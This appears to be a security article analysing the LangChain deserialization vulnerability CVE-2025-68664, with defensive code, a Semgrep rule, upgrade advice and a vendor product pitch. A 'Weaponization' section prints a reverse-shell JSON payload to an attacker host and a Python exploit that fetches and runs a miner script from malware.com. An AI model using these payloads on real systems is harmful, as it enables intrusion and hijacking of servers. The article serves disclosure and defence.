

In the AI security warfare of 2025, the disclosure of the LangChain serialization injection vulnerability CVE-2025-68664 hit with the force of a depth charge. If Prompt Injection is about “tricking” the model at the application layer, CVE-2025-68664 is about “owning” the server at the infrastructure layer.

As the de facto orchestration standard for Agentic AI, LangChain’s security posture is critical. CVE-2025-68664 (CVSS 9.8, Critical) exposes a foundational architectural flaw in how the framework handles the restoration of complex Agent states: Control Failure in JSON Object Instantiation.

This article goes beyond surface-level news coverage. Taking a reverse-engineering perspective, we dissect the langchain-core source code, trace the full call chain from JSON to RCE, and provide enterprise-grade automation rules for Blue Teams.

Anatomy of the Vulnerability: When load Becomes a Backdoor

LangChain’s power lies in its composability. To support the persistence of Chains and Agents, LangChain provides the dumpd and load functions, which serialize Python objects into JSON-compatible dictionaries and deserialize them back into memory.
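For orientation, the sketch below builds the kind of JSON envelope that dumpd produces for a constructor-type object, using only the standard library. It is a simplified illustration, not LangChain's serializer: to_envelope is a hypothetical helper, the id is illustrative, and real output may carry additional fields.

```python
import json


def to_envelope(id_path, kwargs):
    """Build a simplified LangChain-style 'constructor' envelope (hypothetical helper)."""
    return {
        "lc": 1,                 # marker the loader looks for
        "type": "constructor",   # asks the loader to instantiate id_path with kwargs
        "id": list(id_path),     # module path segments, then the class name
        "kwargs": dict(kwargs),  # constructor keyword arguments
    }


envelope = to_envelope(
    ["langchain", "prompts", "prompt", "PromptTemplate"],
    {"template": "Hello {name}", "input_variables": ["name"]},
)
text = json.dumps(envelope)

# Decoding only yields a plain dict again; turning it into a live object is
# entirely the loader's decision, which is why the loader's checks matter.
assert json.loads(text) == envelope
print(text)
```

The key point is that the id field is just a list of strings: whatever the loader does with it determines what code runs.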

The root of CVE-2025-68664 lies in the langchain_core/load/load.py module of the langchain-core package. In versions prior to the 2025 patch, the loader relied on a mapping mechanism to decide which classes could be instantiated. However, this mechanism contained a logic flaw: when processing serialized objects marked with the constructor type, the loader failed to strictly validate the module path in the id field. This allowed attackers to bypass the allowlist and import arbitrary Python modules.
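The missing step is strict validation of the id path before anything is imported. A minimal stdlib-only sketch of what "strict" can mean, assuming a hypothetical ALLOWED_ROOTS set and validate_lc_id helper (this is not langchain_core's code): every segment must be a plain identifier, and the root package must match the allowlist exactly rather than by prefix.

```python
import re

# Hypothetical allowlist: list only the root packages your application serializes.
ALLOWED_ROOTS = frozenset({"langchain", "langchain_core", "langchain_community"})

# A plain Python identifier: no dots, slashes, or other path tricks.
_SEGMENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def validate_lc_id(lc_id, allowed_roots=ALLOWED_ROOTS):
    """Return the id as a tuple if it is safe to resolve, else raise ValueError."""
    if not isinstance(lc_id, list) or len(lc_id) < 2:
        raise ValueError("id must be a list with at least a module and a class name")
    for segment in lc_id:
        # Reject non-strings, non-identifiers, and dunder names such as __import__.
        if (not isinstance(segment, str)
                or not _SEGMENT.fullmatch(segment)
                or segment.startswith("__")):
            raise ValueError(f"invalid id segment: {segment!r}")
    # Exact match on the root package; a prefix test such as
    # startswith("langchain") would also admit "langchain_evil".
    if lc_id[0] not in allowed_roots:
        raise ValueError(f"namespace {lc_id[0]!r} is not allowed")
    return tuple(lc_id)
```

With this check, ["subprocess", "check_output"] and look-alikes such as ["langchain_evil", "X"] are rejected before any import happens.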

Source-Level Logic Failure

In affected versions, the loading logic looked roughly like this (simplified for clarity):

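```python
import importlib


# Conceptual representation of the vulnerable logic (not langchain_core's actual source)
def _load_constructor(lc_id, kwargs):
    # Treat all but the last id segment as a module path, the last as the callable
    module = importlib.import_module(".".join(lc_id[:-1]))
    return getattr(module, lc_id[-1])(**(kwargs or {}))


def load(obj, secrets_map=None):
    if isinstance(obj, dict) and "lc" in obj:
        # Extract object ID, e.g., ["langchain", "llms", "OpenAI"]
        lc_id = obj.get("id")
        # VULNERABILITY: whatever check exists here fails to block standard libraries,
        # so an attacker payload such as ["subprocess", "check_output"] passes through
        if obj.get("type") == "constructor":
            return _load_constructor(lc_id, obj.get("kwargs"))
    return obj
```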

Attackers exploit this by crafting lc_id arrays that induce importlib to load sensitive system modules (such as os, subprocess, or sys) and then pass attacker-controlled arguments to the callables those modules expose, such as subprocess.check_output.
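Even with validation, handing attacker-supplied strings to importlib is fragile. An alternative design resolves ids only through an explicit table of classes the application expects, so an unknown id never reaches the import system at all. A minimal sketch, assuming a hypothetical Greeting class and REGISTRY mapping; it illustrates the pattern and is not how langchain_core's loader is implemented.

```python
from dataclasses import dataclass


@dataclass
class Greeting:
    """Hypothetical application class that is allowed to be deserialized."""
    template: str


# Explicit table: exact id tuple -> class. Nothing outside it can be built.
REGISTRY = {
    ("my_app", "prompts", "Greeting"): Greeting,
}


def safe_load(obj):
    """Recursively rebuild registered objects; reject any unknown constructor id."""
    if isinstance(obj, list):
        return [safe_load(item) for item in obj]
    if not isinstance(obj, dict):
        return obj
    if obj.get("lc") == 1 and obj.get("type") == "constructor":
        ident = obj.get("id")
        if not (isinstance(ident, list) and all(isinstance(s, str) for s in ident)):
            raise ValueError("constructor id must be a list of strings")
        cls = REGISTRY.get(tuple(ident))
        if cls is None:
            # No importlib fallback: unregistered ids are refused outright.
            raise ValueError(f"refusing to construct unregistered id {ident!r}")
        kwargs = obj.get("kwargs") or {}
        if not isinstance(kwargs, dict):
            raise ValueError("kwargs must be an object")
        return cls(**{key: safe_load(value) for key, value in kwargs.items()})
    return {key: safe_load(value) for key, value in obj.items()}
```

The trade-off is that every serializable class must be registered up front, which is exactly what makes an id like ["subprocess", "check_output"] inert.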

Weaponization: Crafting the Perfect RCE Payload

For Red Team researchers, understanding payload construction is key to verification. CVE-2025-68664 requires no complex binary overflow, just a snippet of precise JSON.

Phase 1: The Exploit Prototype (PoC)

A minimal JSON payload that spawns a reverse shell looks like this:

```json
{
  "lc": 1,
  "type": "constructor",
  "id": ["subprocess", "check_output"],
  "kwargs": {
    "args": ["bash", "-c", "bash -i >& /dev/tcp/attacker-ip/443 0>&1"],
    "shell": false
  }
}
```

Phase 2: Python Exploit Script

In a real-world scenario, an attacker would inject a payload like this into a web application’s “Import Config” endpoint or an Agent’s Memory store.

```python
import requests

# Target: an AI Agent service accepting LangChain config files
url = "http://target-ai-service.com/api/v1/agent/import"

payload = {
    "lc": 1,
    "type": "constructor",
    "id": ["subprocess", "run"],
    "kwargs": {
        "args": ["wget http://malware.com/miner.sh -O /tmp/x; sh /tmp/x"],
        "shell": True,
        "capture_output": True,
    },
}

# Send the malicious serialized data; the server triggers RCE
# when it passes the request body to LangChain's load()
r = requests.post(url, json=payload)  # json= also sets Content-Type: application/json
print(f"Attack Status: {r.status_code}")
```
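Because a payload like this can be persisted (for example, in an Agent's Memory store) and only deserialized later, defenders may want to inventory where lc envelopes appear in stored records. A stdlib-only sketch; find_lc_envelopes, flag_foreign_envelopes, and the record layout in the demo are hypothetical, and the allowed roots should match the packages your application actually serializes.

```python
def find_lc_envelopes(node, path="$"):
    """Yield (json_path, type, id) for every dict that carries an 'lc' marker."""
    if isinstance(node, dict):
        if "lc" in node:
            yield path, node.get("type"), node.get("id")
        for key, value in node.items():
            yield from find_lc_envelopes(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from find_lc_envelopes(value, f"{path}[{index}]")


def flag_foreign_envelopes(record, allowed_roots=("langchain", "langchain_core")):
    """Return envelopes whose id does not start with an allowed root package."""
    flagged = []
    for path, kind, ident in find_lc_envelopes(record):
        root = ident[0] if isinstance(ident, list) and ident else None
        if root not in allowed_roots:
            flagged.append((path, kind, ident))
    return flagged


# Hypothetical stored memory record with an injected envelope.
memory_record = {
    "messages": [
        {"role": "user", "content": "hi"},
        {"lc": 1, "type": "constructor", "id": ["subprocess", "run"], "kwargs": {}},
    ]
}
print(flag_foreign_envelopes(memory_record))
# [('$.messages[1]', 'constructor', ['subprocess', 'run'])]
```

Any dict with an lc key is reported, so expect some benign hits; the goal is triage of stored data, not blocking.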

AI-Driven Defense: Penligent’s Deep Audit Technology

Traditional Web Scanners (like Nikto or OWASP ZAP) typically fail against CVE-2025-68664 because they cannot understand the semantic impact of a JSON payload on the Python runtime. They see valid JSON; the server sees a command execution instruction.

This is where Penligent.ai demonstrates its technical superiority. Penligent uses Semantic-Aware Serialization Auditing:

- AST Reverse Analysis: Penligent’s AI Agents do not just blindly fuzz. They first parse the AST (Abstract Syntax Tree) of the target application to identify the specific LangChain version and loading logic, and pinpoint unsafe load calls in the codebase.
- Dynamic Sandbox Verification: During detection, Penligent simulates the loading process in an isolated micro-VM. It injects serialized objects containing “Canary Tokens.” If an object successfully triggers an Out-of-Band (OOB) network request (a DNS query), the system confirms the vulnerability with zero false positives.

For enterprise security teams, Penligent offers full-spectrum defense from “Code Commit” to “Runtime Monitoring,” ensuring no malicious Agent configurations slip into production.

Blue Team Handbook: Detection & Remediation

Before patches are fully deployed, Blue Teams need detection rules to identify attack attempts.

1. Semgrep Static Analysis Rule

Add the following rule to your CI/CD pipeline to scan your codebase for vulnerable calls:

```yaml
rules:
  - id: langchain-unsafe-load
    pattern-either:
      - pattern: langchain_core.load.load(...)
      - pattern: langchain_core.load.loads(...)
      - pattern: langchain.load.load(...)
      - pattern: langchain.load.loads(...)
    message: >-
      LangChain deserialization call detected. CVE-2025-68664 allows RCE via crafted
      serialized data. Upgrade langchain-core and never pass untrusted input to load()/loads().
    languages: [python]
    severity: ERROR
```
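Static rules only find call sites. At the HTTP edge, a coarse signature can flag request bodies that carry a constructor envelope pointing at a commonly abused standard-library module. A stdlib-only sketch; DANGEROUS_ROOTS, the regex, and looks_like_lc_rce_attempt are assumptions to tune against your own traffic, and a JSON-aware check (parse, then walk the structure) is more reliable than any regex, since JSON escapes such as \u0073 can evade it.

```python
import re

# Hypothetical denylist of root modules commonly abused for command execution.
DANGEROUS_ROOTS = ("os", "subprocess", "sys", "builtins", "importlib", "posix", "pty")

# Captures the first element of an "id": [...] array in raw JSON text.
_ID_ROOT = re.compile(r'"id"\s*:\s*\[\s*"([A-Za-z_][A-Za-z0-9_.]*)"')


def looks_like_lc_rce_attempt(body: str) -> bool:
    """Coarse check for raw request bodies; expect both misses and false positives."""
    if '"lc"' not in body or '"constructor"' not in body:
        return False
    for match in _ID_ROOT.finditer(body):
        root = match.group(1).split(".")[0]
        if root in DANGEROUS_ROOTS:
            return True
    return False
```

A hit is best treated as an alert for review rather than an automatic block.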

2. Emergency Remediation

Plan A (Recommended): Upgrade Dependencies

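LangChain has patched this logic in langchain-core, introducing a stricter default allowlist mechanism. Upgrade to the fixed release named in the official security advisory for your release line (0.3.81 on the 0.3.x line and 1.2.5 on the 1.x line).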
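To verify the upgrade in a running environment, the installed version can be read from package metadata and compared against a minimum. A stdlib-only sketch; version_tuple, is_at_least, and installed_langchain_core are hypothetical helpers, and the comparison only looks at numeric release segments (pre-release tags such as rc1 are ignored).

```python
import re
from importlib import metadata


def version_tuple(version: str) -> tuple:
    """Parse the leading numeric release segment, e.g. '0.3.81' -> (0, 3, 81)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def is_at_least(installed: str, minimum: str) -> bool:
    """True if installed >= minimum, comparing release numbers only."""
    a, b = version_tuple(installed), version_tuple(minimum)
    width = max(len(a), len(b))
    # Pad with zeros so '1.2' compares equal to '1.2.0'.
    return a + (0,) * (width - len(a)) >= b + (0,) * (width - len(b))


def installed_langchain_core():
    """Return the installed langchain-core version string, or None if absent."""
    try:
        return metadata.version("langchain-core")
    except metadata.PackageNotFoundError:
        return None
```

For example, is_at_least("0.3.15", "0.3.81") is False while is_at_least("1.2.5", "1.2.5") is True; take the minimum for your release line from the advisory itself rather than from this example.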

Plan B (Temporary): Code Hardening

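If you cannot upgrade immediately, limit what reaches the load function and never feed it untrusted input. Note that in langchain_core, the valid_namespaces parameter extends the built-in default namespace allowlist rather than replacing it, so passing it does not by itself narrow loading below the defaults:

```python
from langchain_core.load import load

# unsafe_json_data: the already-parsed dict (use langchain_core.load.loads for raw JSON text).
# valid_namespaces is ADDED to langchain_core's built-in default namespaces;
# it does not remove them, so list only namespaces you actually need.
safe_config = load(
    unsafe_json_data,
    valid_namespaces=["langchain", "langchain_community"],
)
```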
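Because valid_namespaces in langchain_core widens rather than narrows what load accepts, a more dependable stopgap is to inspect the parsed data yourself and refuse anything outside an exact list of expected class ids before it reaches load. A stdlib-only sketch; EXPECTED_IDS, assert_only_expected, and guarded_parse are hypothetical, and the allowlist should contain only the classes your own configs legitimately use. It is deliberately conservative: any lc entry that is not an expected constructor is refused.

```python
import json

# Hypothetical allowlist: the exact class ids your stored configs are expected to contain.
EXPECTED_IDS = frozenset({
    ("langchain", "prompts", "prompt", "PromptTemplate"),
})


def assert_only_expected(node, expected=EXPECTED_IDS):
    """Raise ValueError if any lc envelope in node is not an expected constructor."""
    if isinstance(node, list):
        for item in node:
            assert_only_expected(item, expected)
    elif isinstance(node, dict):
        if "lc" in node:
            ident = node.get("id")
            ok_id = isinstance(ident, list) and all(isinstance(s, str) for s in ident)
            if node.get("type") != "constructor" or not ok_id or tuple(ident) not in expected:
                raise ValueError(
                    f"unexpected serialized object: type={node.get('type')!r} id={ident!r}"
                )
        # Recurse into every value, including kwargs of allowed envelopes.
        for value in node.values():
            assert_only_expected(value, expected)


def guarded_parse(raw_text):
    """Parse JSON and vet it; only hand the result to load() if this returns."""
    data = json.loads(raw_text)
    assert_only_expected(data)
    return data
```

In use, the vetted result would then be passed on as load(guarded_parse(raw_text)); anything nested, such as an envelope hidden inside a wrapper object, is checked too.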

Conclusion

The LangChain serialization injection vulnerability CVE-2025-68664 proves once again that AI infrastructure security cannot be built on “implicit trust.” As LLM applications evolve from “Chatbots” to “Autonomous Agents,” the attack surface targeting serialization, state storage, and tool invocation will keep growing.

Security engineers must recognize that behind every load() call, a shell might be waiting.